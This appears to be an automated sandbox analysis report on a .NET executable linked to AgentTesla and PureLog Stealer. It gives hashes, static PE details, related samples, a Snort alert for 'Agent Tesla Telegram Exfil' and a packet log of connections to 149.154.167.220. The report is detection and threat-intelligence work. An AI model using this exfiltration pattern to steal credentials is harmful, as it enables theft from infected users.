                                                Invoices Receivable Documents.jsGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                Accounts Receivable Documents.jsGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                Order Inquiry for new Purchase_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eKey-n-Stroke.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                https://url2.mailanyone.net/scanner?m=1s7vXH-005dcm-3J&d=4%7Cmail%2F90%2F1715944200%2F1s7vXH-005dcm-3J%7Cin2c%7C57e1b682%7C17902772%7C12174482%7C66473BFB0D7825FF92FF08A4B666BA9C&o=gphta%2F%2Frt%3Anand.aincsgc%2Fmoc&s=nD0kMep_60PrJ_KcnO6ZFgNoENsGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                IMG_579710265.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 149.154.167.220
                                                ZTIBG_Order #U0637#U0644#U0628 ZTT Group 2024.5.17 pptx.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                DsQnR4KKDbEYJq8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 149.154.167.220
                                                shipment invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                EAP.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 149.154.167.220
                                                HVC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 149.154.167.220

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):5.0093351523926
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                File size:249'856 bytes
                                                MD5:1022eee3d28a81920664b590983aafaa
                                                SHA1:002c1889f8e8ebbf781e3a1edb0985068b2a5b96
                                                SHA256:ccd022fa7f9a0ee0928a7736faed2f9d9123234d209c7fdf9b436776669c4644
                                                SHA512:b2bc0d955f356596f939c0457c367fa79b192237e6a27591e02cf315076afab1908ed3093dda53bd2bcb7dfe20604779b72255e97c52c4c8487c8a50c40d6d4b
                                                SSDEEP:3072:DsUqShjy6yaCYHb+lDzVuXn9Phn755rh4xsnD:DsUqcy6yaCY7+lDzV4PhnTh4e
                                                TLSH:E8340F027E88EB15E5A83E3792EF6D2413B2B0C70633C60B6F49AF5528517825D7E72D
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..f................................. ........@.. .......................@............@................................

                                                File Icon

                                                Icon Hash:90cececece8e8eb0

                                                Static PE Info

                                                General

                                                Entrypoint:0x43e52e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x661CD820 [Mon Apr 15 07:32:48 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3e4d80x53.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000x546.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x420000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x3c5340x3c600011624d87e0649a90b3b1bf2e00ef64bFalse0.35819827251552794data5.020453521983489IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x400000x5460x60013710f083c5f6d693011c99ff53d1b71False0.3971354166666667data3.993854391184784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x420000xc0x2008275738e2c8d184d08335f3833a97f65False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0x400a00x2bcdata0.43714285714285717
                                                RT_MANIFEST0x4035c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                05/18/24-01:35:57.911306TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49730443192.168.2.4149.154.167.220

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 18, 2024 01:35:56.266114950 CEST49730443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:56.266156912 CEST44349730149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:56.266324043 CEST49730443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:56.275564909 CEST49730443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:56.275609016 CEST44349730149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:57.437931061 CEST44349730149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:57.438057899 CEST49730443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:57.442511082 CEST49730443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:57.442538977 CEST44349730149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:57.443062067 CEST44349730149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:57.488246918 CEST49730443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:57.563107014 CEST49730443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:57.608119965 CEST44349730149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:57.911007881 CEST49730443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:57.911043882 CEST44349730149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:57.981451988 CEST44349730149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:58.035314083 CEST49730443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:58.234256029 CEST44349730149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:58.239382029 CEST44349730149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:58.239483118 CEST49730443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:58.243407011 CEST49730443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:58.284511089 CEST49731443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:58.284598112 CEST44349731149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:58.284692049 CEST49731443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:58.284951925 CEST49731443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:58.284991026 CEST44349731149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:59.386918068 CEST44349731149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:59.388540030 CEST49731443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:59.388607025 CEST44349731149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:59.738347054 CEST49731443192.168.2.4149.154.167.220
                                                May 18, 2024 01:35:59.738385916 CEST44349731149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:59.903084993 CEST44349731149.154.167.220192.168.2.4
                                                May 18, 2024 01:35:59.956988096 CEST49731443192.168.2.4149.154.167.220
                                                May 18, 2024 01:36:00.097383976 CEST44349731149.154.167.220192.168.2.4
                                                May 18, 2024 01:36:00.098078966 CEST49731443192.168.2.4149.154.167.220
                                                May 18, 2024 01:36:00.098280907 CEST44349731149.154.167.220192.168.2.4
                                                May 18, 2024 01:36:00.098357916 CEST49731443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:41.886121988 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:41.886161089 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:41.886223078 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:41.886594057 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:41.886615992 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:42.993087053 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:42.993165970 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:42.994976997 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:42.994983912 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:42.995604992 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:43.006150961 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:43.048141956 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:43.363490105 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:43.363529921 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:43.363600969 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:43.363616943 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:43.363869905 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:43.364052057 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:43.523284912 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:43.660078049 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:43.989321947 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:43.989963055 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:37:43.990250111 CEST44349739149.154.167.220192.168.2.4
                                                May 18, 2024 01:37:43.990326881 CEST49739443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:03.327594995 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:03.327666044 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:03.332549095 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:03.332828045 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:03.332859993 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:04.447238922 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:04.447329998 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:04.449331045 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:04.449358940 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:04.450180054 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:04.451714039 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:04.496123075 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:04.801506996 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:04.801573038 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:04.805557013 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:04.805593967 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:04.809521914 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:04.809545040 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:04.973138094 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:05.021465063 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:05.443814993 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:05.448483944 CEST44349740149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:05.448762894 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:05.449410915 CEST49740443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:08.765634060 CEST49741443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:08.765688896 CEST44349741149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:08.768255949 CEST49741443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:08.772140980 CEST49741443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:08.772176027 CEST44349741149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:09.594235897 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:09.594266891 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:09.594319105 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:09.594635963 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:09.594647884 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:09.602449894 CEST49741443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:09.648118973 CEST44349741149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:09.873923063 CEST44349741149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:09.874085903 CEST44349741149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:09.874119997 CEST49741443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:09.874192953 CEST49741443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:10.696079969 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:10.696161985 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:10.697762012 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:10.697767973 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:10.697985888 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:10.701443911 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:10.744157076 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:11.050894976 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:11.050934076 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:11.051302910 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:11.051328897 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:11.051632881 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:11.051651955 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:11.214653969 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:11.269464970 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:11.680713892 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:11.681246996 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:11.681308031 CEST44349742149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:11.681355953 CEST49742443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:14.276774883 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:14.276874065 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:14.276952028 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:14.277420044 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:14.277456999 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:15.408919096 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:15.409046888 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:15.413459063 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:15.413501978 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:15.413889885 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:15.417454958 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:15.460177898 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:15.769750118 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:15.769825935 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:15.769956112 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:15.769989014 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:15.770087004 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:15.770128965 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:15.934396982 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:15.988194942 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:16.398982048 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:16.399588108 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:16.399673939 CEST44349743149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:16.399739027 CEST49743443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:21.571974039 CEST49744443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:21.572073936 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:21.577538013 CEST49744443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:21.579458952 CEST49744443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:21.579498053 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:22.720604897 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:22.720720053 CEST49744443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:23.430300951 CEST49744443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:23.430330038 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:23.430779934 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:23.432477951 CEST49744443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:23.480132103 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:23.744798899 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:23.745163918 CEST49744443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:23.745256901 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:23.745388031 CEST49744443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:23.745482922 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:23.745623112 CEST49744443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:23.745683908 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:24.408597946 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:24.409166098 CEST49744443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:24.409229994 CEST44349744149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:24.409285069 CEST49744443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:36.071331024 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:36.071367025 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:36.071439981 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:36.071777105 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:36.071789026 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.184807062 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.184884071 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:37.186904907 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:37.186913013 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.187129021 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.189433098 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:37.236131907 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.539403915 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:37.539441109 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.539604902 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:37.539627075 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.539753914 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:37.539772987 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.697925091 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.738277912 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:38.173115015 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:38.173702002 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:38.173831940 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:38.174245119 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:38.174258947 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:38.174329042 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:44.673496962 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:44.673583031 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:44.674066067 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:44.677541018 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:44.677615881 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:45.804384947 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:45.804491043 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:45.806083918 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:45.806117058 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:45.806448936 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:45.807766914 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:45.848189116 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.160444975 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:46.160501003 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.160758972 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:46.160798073 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.161078930 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:46.161319971 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.326735020 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.378937006 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:46.791660070 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.793534040 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:46.793662071 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.793997049 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:48.464720964 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:48.464812040 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:48.464899063 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:48.465337038 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:48.465367079 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.547055006 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.547207117 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.549500942 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.549554110 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.549917936 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.557539940 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.604125023 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.910444021 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.910530090 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.910826921 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.910913944 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.911259890 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.911329985 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:50.061837912 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:50.113317966 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:50.523686886 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:50.524452925 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:50.524566889 CEST44349747149.154.167.220192.168.2.4
